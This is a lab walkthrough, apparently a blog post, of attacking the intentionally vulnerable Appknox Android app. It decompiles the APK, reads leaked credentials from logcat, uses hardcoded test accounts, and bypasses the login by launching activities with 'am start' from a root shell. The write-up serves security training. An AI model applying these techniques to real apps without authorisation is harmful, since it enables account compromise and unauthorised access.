Let’s Hack Android: Appknox Vulnerable Application

Requirements:

1. Source code: https://github.com/appknox/vulnerable-application
2. Android studio
3. Android VM

Setting up Android Studio in Santoku:

Let’s Hack Android: DIVA android

Let’s start:

1. Git clone project

git clone https://github.com/appknox/vulnerable-application.git

2. Open project with Android Studio, fix bug, and re-compile

3. connect with vm

adb connect <ip>:5555

4. Build APK

5. Install the app

or using command

adb install <file name>.apk

Because app is old, while running the app might cause some run-time exception. You have to find the fix using google.

Here’s the app’s UI.

Reconnaissance

1. Dump the permissions

aapt dump permissions <file name>.apk

2. View manifest file

apktool d vulnerable-application.apk --output vulnerable-application-apktool
cd vulnerable-application-apktool
ls -la

gedit AndroidManifest.xml

Besides permissions, there’re 3 activities

This app can be debuggable

3. View source code

copy and change to be zip file

cp vulnerable-application.apk vulnerable-application.zip

extract

unzip vulnerable-application.zip -d vulnerable-application
cd vulnerable-application
ls -la

decompile

dex2jar classes.dex

ls -la

jd-gui classes_dex2jar.jar

View “LoginActivity”

There’ re credentials

There’s a log with credential.

View “NextView”

Nothing so far

View “FailView”

1. Insecure Logging

From “Credentials” log

adb logcat | grep "Credentials"

username: foo@example.com, password: hellouu

Use it

Success!!!

2. Hardcoding

There’re 2 accounts from hardcoding in LoginActivity that I can use.

username: foo@example.com, password: hello
username: bar@example.com, password: world

Both accounts work

3. Bypassing log-in

adb shell

run as root

su

bypass to NextView

am start com.appknox.testapplication/.NextView

bypass to FailView

am start com.appknox.testapplication/.FailView